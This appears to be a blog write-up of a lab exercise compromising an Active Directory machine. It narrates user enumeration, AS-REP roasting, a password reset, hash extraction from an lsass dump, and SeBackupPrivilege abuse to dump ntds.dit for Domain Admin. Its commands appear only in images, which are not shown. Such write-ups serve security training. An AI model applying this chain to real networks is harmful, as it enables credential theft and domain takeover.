Image for post
Image for post

Target Experience:

My observations while working this target:

Tools:

The recommended tools for this lab were:

Vulnerabilities:

· Exposed Usernames

Information Gathering:

Using Nmap, I saved the output while scanning for service version detection, OS detection, script scanning, and verbose mode of the target system.

Image for post
Image for post
Figure 1: Nmap Scan
Image for post
Image for post
Figure 2: CME Enumeration
Image for post
Image for post
Figure 3: Share Enumeration

Foothold:

Part 1:

After identifying that the enumerated share was more than likely valid user accounts, I created a user list in preparation for password spraying.

Image for post
Image for post
Figure 4: Users.lst
Image for post
Image for post
Figure 5: ASREPRoast
Image for post
Image for post
Figure 6: ASREP Hash
Image for post
Image for post
Figure 7: Cracked Hash
Image for post
Image for post
Figure 8: Validated Credentials

Part 2:

I’ll have to admit that I had issues with trying to figure this part out. And by far, this was the most difficult part for me. I would usually execute a SharpHound collector, but those attempts returned with no visible results within BloodHound. I attempted a few other enumeration attempts, but was not having any luck. I turned to the forums and folks commented “what can a support account due?”

Image for post
Image for post
Figure 9: PowerShell RunAs
Image for post
Image for post
Figure 10: Invoke-ACLScanner Results (audit2020)
Image for post
Image for post
Figure 11: SID Identification
Image for post
Image for post
Figure 12: Domain Password Policy
Image for post
Image for post
Figure 13: Password Change and Validation

Part 3:

Using the audit2020 account, I enumerated the shares with CME. I noted that the audit2020 account had read access to the forensics folder.

Image for post
Image for post
Figure 14: Enumerated Shares
Image for post
Image for post
Figure 15: Discovered lsass.zip
Image for post
Image for post
Figure 16: Extracted Hash
Image for post
Image for post
Figure 17: CME Credential Validation

Privilege Escalation:

With validated credentials, I launched Evil-WinRM to connect to the target and enumerated privileges.

Image for post
Image for post
Figure 18: SeBackupPrivilege
Image for post
Image for post
Figure 19: shadowcopy.cmd & shadow.txt
Image for post
Image for post
Figure 20: Diskshadow Execution
Image for post
Image for post
Figure 21: Copy-FileSeBackupPrivilege (ntds.dit)
Image for post
Image for post
Figure 22: Extract Key & Download Files
Image for post
Image for post
Figure 23: Extracted Hashes
Image for post
Image for post
Figure 24: Escalated Privileges (DA)

References:

https://malicious.link/post/2017/reset-ad-user-password-with-linux/

Disclaimer:

This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.

Cyber Security Enthusiast

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store